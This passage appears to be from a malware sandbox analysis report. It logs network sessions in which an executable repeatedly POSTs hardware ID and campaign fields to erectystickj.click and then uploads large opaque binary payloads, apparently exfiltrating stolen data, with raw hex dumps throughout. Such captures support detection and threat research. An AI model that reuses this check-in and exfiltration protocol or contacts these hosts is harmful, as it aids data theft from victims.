2uo6gzE4k9YRLIYtc7pBT8odhof3BBC++UDWFm93SZbp7DixPy7ZyFY4yid4/RYKiVTFgeVNRPHfSc8QMz8IiKz4dLY+Y4uJXz/DIHL5FgzbG4OU/QAWo/RPwRFlaEuR5Oo4ozsj0MIfe4YtZ7pBT+oNk4z6AQq6/0fSEXglBtfz5iXxajXD3lgqiDM//RVPkVqDj/sKGr/sQcITZ2xBk+riNLU2JNbKUz7BKXD+EAHAFcXIvQoE8aYE5QdraUX
2024-12-26 11:08:13 UTC	269	IN	Data Raw: 37 68 79 62 5a 50 4f 52 33 57 65 61 6c 2f 78 44 77 72 4f 44 4d 65 7a 2f 67 4d 53 74 75 67 45 32 79 4d 6d 4a 55 65 4e 6f 72 6b 4e 71 48 49 6b 33 34 6b 48 64 64 4d 74 66 2f 30 44 47 63 34 57 6c 49 33 77 41 54 36 2b 2b 56 4c 48 45 32 74 30 51 64 76 70 37 48 54 2f 63 69 54 4c 69 51 64 31 36 53 31 70 2b 54 59 4d 32 42 50 46 79 4c 30 4b 43 76 47 6d 42 50 70 63 65 6d 5a 59 6c 4f 33 77 43 76 46 71 4f 75 32 4a 56 43 50 42 4f 6e 7a 73 45 67 4c 46 43 37 76 47 70 56 6c 4f 34 36 77 57 6c 67 4d 6f 65 6e 66 5a 6f 75 42 30 36 51 73 36 6b 39 38 66 62 5a 52 6b 50 2b 68 5a 56 34 6c 64 68 70 54 76 43 78 2b 6e 2f 51 50 36 49 6b 39 7a 51 70 44 79 35 69 4f 2b 63 6d 32 54 78 68 39 74 2f 32 70 32 2f 51 49 65 33 78 65 56 67 62 30 79 55 76 48 6d 42 4a 78 63 58 57 5a 47 6d 65 58 33 Data Ascii: 7hybZPOR3Weal/xDwrODMez/gMStugE2yMmJUeNorkNqHIk34kHddMtf/0DGc4WlI3wAT6++VLHE2t0Qdvp7HT/ciTLiQd16S1p+TYM2BPFyL0KCvGmBPpcemZYlO3wCvFqOu2JVCPBOnzsEgLFC7vGpVlO46wWlgMoenfZouB06Qs6k98fbZRkP+hZV4ldhpTvCx+n/QP6Ik9zQpDy5iO+cm2Txh9t/2p2/QIe3xeVgb0yUvHmBJxcXWZGmeX3
2024-12-26 11:08:13 UTC	1369	IN	Data Raw: 32 63 37 30 0d 0a 4a 54 2b 30 57 51 6d 4a 51 74 62 49 76 51 6b 4e 38 61 59 55 6c 6b 63 39 4e 68 2f 48 73 50 35 36 71 48 49 31 6b 35 45 4e 65 34 59 34 50 36 4a 5a 53 4d 6f 49 6c 34 44 2b 47 78 2f 32 77 48 72 6a 42 6d 56 6a 58 34 62 63 33 7a 4f 72 50 79 58 45 32 42 4d 67 78 53 52 78 2f 51 39 50 68 31 71 4b 78 71 55 30 58 50 6d 2b 65 34 70 63 63 43 55 51 31 39 66 69 4f 72 38 31 4e 63 4b 45 65 43 2f 4c 4c 47 6a 72 57 55 47 4a 48 4d 58 65 72 55 4e 63 74 65 38 45 6e 45 77 36 50 68 33 45 74 62 46 6d 72 6e 77 36 6b 39 38 66 62 5a 52 6b 50 2b 68 5a 56 34 6c 64 68 70 54 76 43 78 2b 6e 2f 51 50 36 49 6b 5a 69 54 70 4c 6c 38 58 61 66 4f 54 66 55 69 52 46 31 79 57 6f 6e 77 31 6c 48 69 53 58 4c 78 75 56 4e 52 50 48 4c 52 38 6f 53 62 33 4e 5a 32 73 7a 6d 4d 72 51 31 4d Data Ascii: 2c70JT+0WQmJQtbIvQkN8aYUlkc9Nh/HsP56qHI1k5ENe4Y4P6JZSMoIl4D+Gx/2wHrjBmVjX4bc3zOrPyXE2BMgxSRx/Q9Ph1qKxqU0XPm+e4pccCUQ19fiOr81NcKEeC/LLGjrWUGJHMXerUNcte8EnEw6Ph3EtbFmrnw6k98fbZRkP+hZV4ldhpTvCx+n/QP6IkZiTpLl8XafOTfUiRF1yWonw1lHiSXLxuVNRPHLR8oSb3NZ2szmMrQ1M
2024-12-26 11:08:13 UTC	1369	IN	Data Raw: 31 6e 6e 67 78 75 67 74 50 6b 56 72 43 68 65 38 66 47 72 4c 6f 52 34 4d 69 56 6b 4a 47 6b 4f 50 33 4a 4b 59 39 62 50 33 2f 66 67 76 34 50 33 7a 30 46 77 6a 66 43 38 58 49 76 51 4a 63 36 63 63 45 6a 46 78 58 4b 77 69 50 6f 72 6c 30 68 44 45 74 33 63 35 4a 4a 49 73 4e 63 66 30 59 47 64 6b 4e 69 73 6e 54 4f 7a 33 78 73 41 54 43 58 44 41 33 42 74 66 6d 38 48 54 70 59 6e 47 49 6e 41 78 69 6c 6e 68 67 74 41 42 50 33 31 72 64 31 4c 4e 4e 44 76 47 6d 42 49 4d 66 65 6e 64 4f 6c 50 54 69 63 34 38 4d 42 4e 33 4f 58 69 50 57 4a 33 50 62 47 68 37 44 4a 4c 75 54 2f 67 4d 53 74 75 68 56 68 46 49 6f 61 67 6a 50 32 36 46 38 38 51 31 74 6b 39 45 66 62 59 59 66 66 50 51 58 43 4e 38 4c 79 4b 48 7a 43 68 32 6e 37 6b 6e 49 50 57 74 30 51 74 65 73 6f 54 4c 78 61 6e 47 64 69 56 Data Ascii: 1nngxugtPkVrChe8fGrLoR4MiVkJGkOP3JKY9bP3/fgv4P3z0FwjfC8XIvQJc6ccEjFxXKwiPorl0hDEt3c5JJIsNcf0YGdkNisnTOz3xsATCXDA3Btfm8HTpYnGInAxilnhgtABP31rd1LNNDvGmBIMfendOlPTic48MBN3OXiPWJ3PbGh7DJLuT/gMStuhVhFIoagjP26F88Q1tk9EfbYYffPQXCN8LyKHzCh2n7knIPWt0QtesoTLxanGdiV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49725	172.67.154.166	443	4040	C:\Users\user\Desktop\RIMz2N1u5y.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:08:15 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6K367U80M9EVNI7XAB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12864 Host: erectystickj.click
2024-12-26 11:08:15 UTC	12864	OUT	Data Raw: 2d 2d 36 4b 33 36 37 55 38 30 4d 39 45 56 4e 49 37 58 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 30 45 42 42 41 33 46 41 43 44 35 44 31 30 39 35 34 36 45 36 34 41 32 38 44 33 46 44 34 39 0d 0a 2d 2d 36 4b 33 36 37 55 38 30 4d 39 45 56 4e 49 37 58 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4b 33 36 37 55 38 30 4d 39 45 56 4e 49 37 58 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 30 38 38 34 Data Ascii: --6K367U80M9EVNI7XABContent-Disposition: form-data; name="hwid"790EBBA3FACD5D109546E64A28D3FD49--6K367U80M9EVNI7XABContent-Disposition: form-data; name="pid"2--6K367U80M9EVNI7XABContent-Disposition: form-data; name="lid"yau6Na--80884
2024-12-26 11:08:16 UTC	1132	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:08:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=88n2c0c5kp113jnc35jeslitha; expires=Mon, 21 Apr 2025 04:54:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QefCk%2Bsz64R4MShJPbK%2BMjYMX8oiHvBGMXYQMIxV%2BSj2DRwLdZkmXcykfoybztU0v5yzaeV8w%2Fk4vsz9aU7FBcb8p1DJ0MO3TPENS0dj9ZFu3iu8C6pgRLVeCTPy98XWq9P2R0Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f809ca6ff536a53-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1611&rtt_var=615&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13806&delivery_rate=1763285&cwnd=222&unsent_bytes=0&cid=a2b711e55f7b187e&ts=856&x=0"
2024-12-26 11:08:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:08:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49734	172.67.154.166	443	4040	C:\Users\user\Desktop\RIMz2N1u5y.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:08:17 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WZ7WKDKFL68XCI2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15092 Host: erectystickj.click
2024-12-26 11:08:17 UTC	15092	OUT	Data Raw: 2d 2d 57 5a 37 57 4b 44 4b 46 4c 36 38 58 43 49 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 30 45 42 42 41 33 46 41 43 44 35 44 31 30 39 35 34 36 45 36 34 41 32 38 44 33 46 44 34 39 0d 0a 2d 2d 57 5a 37 57 4b 44 4b 46 4c 36 38 58 43 49 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 5a 37 57 4b 44 4b 46 4c 36 38 58 43 49 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 30 38 38 34 34 31 33 37 38 0d 0a 2d 2d Data Ascii: --WZ7WKDKFL68XCI2Content-Disposition: form-data; name="hwid"790EBBA3FACD5D109546E64A28D3FD49--WZ7WKDKFL68XCI2Content-Disposition: form-data; name="pid"2--WZ7WKDKFL68XCI2Content-Disposition: form-data; name="lid"yau6Na--8088441378--
2024-12-26 11:08:18 UTC	1136	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:08:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9pqvho65upbaav8kes7un16ggb; expires=Mon, 21 Apr 2025 04:54:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2z1r1fEw7j%2BL0dYFoxIKm%2BILPek4K%2BuhDmGtK4ycx0zt5UxRdbozCBBd7kXltI1IDfevms7q%2BA882n49Ld3xh69HhGxEJ19x9nSrzh1XDyAdBQZLVOoTzL%2FbpBI%2B5XlhrnfwLHc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f809cb51f1bc32d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1488&rtt_var=563&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16031&delivery_rate=1936339&cwnd=252&unsent_bytes=0&cid=888d38122c5b369b&ts=907&x=0"
2024-12-26 11:08:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:08:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49740	172.67.154.166	443	4040	C:\Users\user\Desktop\RIMz2N1u5y.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:08:20 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HX79JK73JADHZ16 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19950 Host: erectystickj.click
2024-12-26 11:08:20 UTC	15331	OUT	Data Raw: 2d 2d 48 58 37 39 4a 4b 37 33 4a 41 44 48 5a 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 30 45 42 42 41 33 46 41 43 44 35 44 31 30 39 35 34 36 45 36 34 41 32 38 44 33 46 44 34 39 0d 0a 2d 2d 48 58 37 39 4a 4b 37 33 4a 41 44 48 5a 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 58 37 39 4a 4b 37 33 4a 41 44 48 5a 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 30 38 38 34 34 31 33 37 38 0d 0a 2d 2d Data Ascii: --HX79JK73JADHZ16Content-Disposition: form-data; name="hwid"790EBBA3FACD5D109546E64A28D3FD49--HX79JK73JADHZ16Content-Disposition: form-data; name="pid"3--HX79JK73JADHZ16Content-Disposition: form-data; name="lid"yau6Na--8088441378--
2024-12-26 11:08:20 UTC	4619	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 Data Ascii: +?2+?2+?o?Mp5p_oI
2024-12-26 11:08:21 UTC	1134	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:08:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5uh4km0jrsvp98oldptkcelu1o; expires=Mon, 21 Apr 2025 04:54:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CPQhrfgWA1%2Bz7oMRQkY64MHeTwhx%2F9Z5BBhpqwzzXcLBDY%2FkHFUehUK7QVpwQcK4dJ6oYBCf7b4pvCbSYqYp4qCbF82Yi%2Fuii4WjqoAHEPPDzAMmG2REpImtqskfKwRLsKw6KOw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f809cc449d35e5f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1802&rtt_var=766&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=20911&delivery_rate=1620421&cwnd=251&unsent_bytes=0&cid=9cff1926a87a7700&ts=1010&x=0"
2024-12-26 11:08:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:08:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49751	172.67.154.166	443	4040	C:\Users\user\Desktop\RIMz2N1u5y.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:08:22 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6WAPLLJ9IQMTD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1203 Host: erectystickj.click
2024-12-26 11:08:22 UTC	1203	OUT	Data Raw: 2d 2d 36 57 41 50 4c 4c 4a 39 49 51 4d 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 30 45 42 42 41 33 46 41 43 44 35 44 31 30 39 35 34 36 45 36 34 41 32 38 44 33 46 44 34 39 0d 0a 2d 2d 36 57 41 50 4c 4c 4a 39 49 51 4d 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 57 41 50 4c 4c 4a 39 49 51 4d 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 30 38 38 34 34 31 33 37 38 0d 0a 2d 2d 36 57 41 50 4c 4c Data Ascii: --6WAPLLJ9IQMTDContent-Disposition: form-data; name="hwid"790EBBA3FACD5D109546E64A28D3FD49--6WAPLLJ9IQMTDContent-Disposition: form-data; name="pid"1--6WAPLLJ9IQMTDContent-Disposition: form-data; name="lid"yau6Na--8088441378--6WAPLL
2024-12-26 11:08:24 UTC	1141	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:08:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o2mb53ioh7c84v8sec4s0vgvma; expires=Mon, 21 Apr 2025 04:55:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3kP1je%2BA19bu66KhpEZM2gWngLuOD0E0Q%2B%2FxwMwBWCR%2BgoXwclIUAdFA%2ByN%2FiswHMk%2Bs7nOCvQXWp1XaCfeqBoHD2GqWN6AH%2BnH7jmL6VV6%2Fmz0evQ92NjgN47YvfsxIHmhku58%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f809cd4ecfc431a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1659&rtt_var=628&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2117&delivery_rate=1734997&cwnd=224&unsent_bytes=0&cid=1062c6e59aa30ee9&ts=1134&x=0"
2024-12-26 11:08:24 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 11:08:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49757	172.67.154.166	443	4040	C:\Users\user\Desktop\RIMz2N1u5y.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:08:26 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=89RV4H5A7CXBFVERR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 578855 Host: erectystickj.click
2024-12-26 11:08:26 UTC	15331	OUT	Data Raw: 2d 2d 38 39 52 56 34 48 35 41 37 43 58 42 46 56 45 52 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 30 45 42 42 41 33 46 41 43 44 35 44 31 30 39 35 34 36 45 36 34 41 32 38 44 33 46 44 34 39 0d 0a 2d 2d 38 39 52 56 34 48 35 41 37 43 58 42 46 56 45 52 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 39 52 56 34 48 35 41 37 43 58 42 46 56 45 52 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 30 38 38 34 34 31 33 Data Ascii: --89RV4H5A7CXBFVERRContent-Disposition: form-data; name="hwid"790EBBA3FACD5D109546E64A28D3FD49--89RV4H5A7CXBFVERRContent-Disposition: form-data; name="pid"1--89RV4H5A7CXBFVERRContent-Disposition: form-data; name="lid"yau6Na--80884413
2024-12-26 11:08:26 UTC	15331	OUT	Data Raw: d6 ff cb 3a 69 ac 8e bf 60 9e 2f 4e 9d df 50 a5 37 7b 50 c2 ef 60 c3 08 a8 79 88 62 1a 51 6e 9c 76 b5 94 56 f0 3e 95 26 f6 65 46 9d dd ad 9e 1f a2 ce b8 f7 3e 4c bb ba dd 8f 6e d0 a9 52 76 c1 49 1f 2c cb 0e e6 66 df bb fa b7 d6 a3 1a b1 14 51 cd 24 2f 43 ac af ee 40 9a a6 33 69 1a 75 70 a9 c7 bd 9a 20 ae 7c de 3f 4c 2d e2 21 ab 69 9b 61 24 91 97 85 a2 f8 61 6c 75 db 82 c2 4b be c2 04 b1 d9 2f 93 17 26 1b ec d1 ef 4a cf 9f 4c dc ed b3 3e 76 9e d3 29 e4 65 6c d4 8a da 61 f7 cd 38 07 77 c3 c0 5a 45 89 3d 61 9f db 24 25 31 a7 46 59 e8 69 ba 4f 94 e4 2d 34 07 75 48 af 70 cb 96 d0 f3 f1 5b 49 ad 01 7f cb 14 37 35 99 60 02 19 c4 62 65 d7 cc a5 ee 3b e2 68 70 12 4d 3b 4a f4 4a 81 9c 4e 82 4a 5a 3d 04 fb f2 47 76 0c 47 78 6d 9f 53 02 9d 87 b1 b0 bb 93 dd 64 85 d7 Data Ascii: :i`/NP7{P`ybQnvV>&eF>LnRvI,fQ$/C@3iup \|?L-!ia$aluK/&JL>v)ela8wZE=a$%1FYiO-4uHp[I75`be;hpM;JJNJZ=GvGxmSd
2024-12-26 11:08:26 UTC	15331	OUT	Data Raw: be ad 35 30 a8 0e 1a ea 16 cc 3e ee 27 81 a2 f0 1d 24 68 7b 8f b7 68 4b d0 8a cf fe 3a 66 f6 a9 3c 41 46 06 1d 89 ee a3 a2 9b 22 51 ef 1a d3 a4 75 f7 ab 37 5d d4 79 38 ff 51 64 8d 15 24 a2 43 7a fa 77 fb 71 53 6d 99 ee e2 1c 63 2f 91 2b 32 d7 2f b3 1c 55 61 dd 4b 14 22 28 56 2c 47 09 e5 82 cf a0 c9 15 1e a7 b8 42 3a 68 3c 92 a1 69 e1 07 ad dd 6f 6b db e1 4d 2e d7 4f 42 93 b2 a7 d7 42 a7 7f d8 d7 b9 d5 ff 51 e9 b5 9b 53 f8 f1 ad 55 5f c1 6c 5d 0e be d7 1d 8b a9 20 70 5f c2 21 4f 1c 1b 9e bf 21 15 bf 15 dd 2d cc 6e 58 0f f5 39 88 85 35 7a 2f b3 06 1c 3b ba 5e 39 05 d5 9b 7e aa c6 b4 53 49 e3 d9 48 8f fe 1a a8 79 86 72 ec a7 bb 71 96 e3 50 50 a4 f3 48 a7 c4 d3 c9 ee 77 f1 7d 22 69 19 65 c7 92 05 5e 1d 45 6c f1 bf d8 e8 6b 5a ce 9e 9c 3e d9 c8 ad 5a 7d fc 21 Data Ascii: 50>'$h{hK:f<AF"Qu7]y8Qd$CzwqSmc/+2/UaK"(V,GB:h<iokM.OBBQSU_l] p_!O!-nX95z/;^9~SIHyrqPPHw}"ie^ElkZ>Z}!
2024-12-26 11:08:26 UTC	15331	OUT	Data Raw: b7 a4 fd aa 02 56 e6 9e 15 37 29 2e 7e fd 58 89 f4 59 03 f4 57 5c b7 5a 9b 8a 5f 67 ec 4a a8 d7 b6 70 d2 06 83 53 31 b6 14 05 6e 99 63 78 5d cd e5 7d da e3 d0 fc b3 56 74 ea f5 66 9f 37 2a 5b 88 b8 03 6d 84 80 df e2 6a aa 77 5a 5f 45 bc a2 78 2a 38 07 da 49 05 7d e7 e5 b9 8d ec 4e bf e1 d0 87 15 79 1c 96 c7 1e 88 6b 9a cd 0b 4e 27 ad e7 df fa d4 3f 14 b5 1e 96 a5 a3 10 24 ed b2 6e 42 8f 36 9a 1d a1 eb ef 04 79 bf 4b 4d 72 00 a8 2e ee 60 eb 04 97 1d e3 0e ba 49 cb 45 ad e8 ba 17 7c 3c 78 f1 c4 7b 05 99 22 54 20 41 5f b0 4d 24 48 97 45 d1 60 bc ba a4 08 df d8 46 39 c5 72 a2 ac 0d fd ac 4e 9a 11 b3 a9 a1 b7 ee c9 d6 81 38 81 23 df 0b 2e 2d da 55 dd a9 76 e0 8c 2f 44 ff bc 39 ec e4 24 1c d0 f5 4f 64 3e c7 c8 c8 f8 a0 28 43 4f ea 19 2f ec 20 e7 eb 3d 40 53 be Data Ascii: V7).~XYW\Z_gJpS1ncx]}Vtf7[mjwZ_Ex8I}NykN'?$nB6yKMr.`IE\|<x{"T A_M$HE`F9rN8#.-Uv/D9$Od>(CO/ =@S
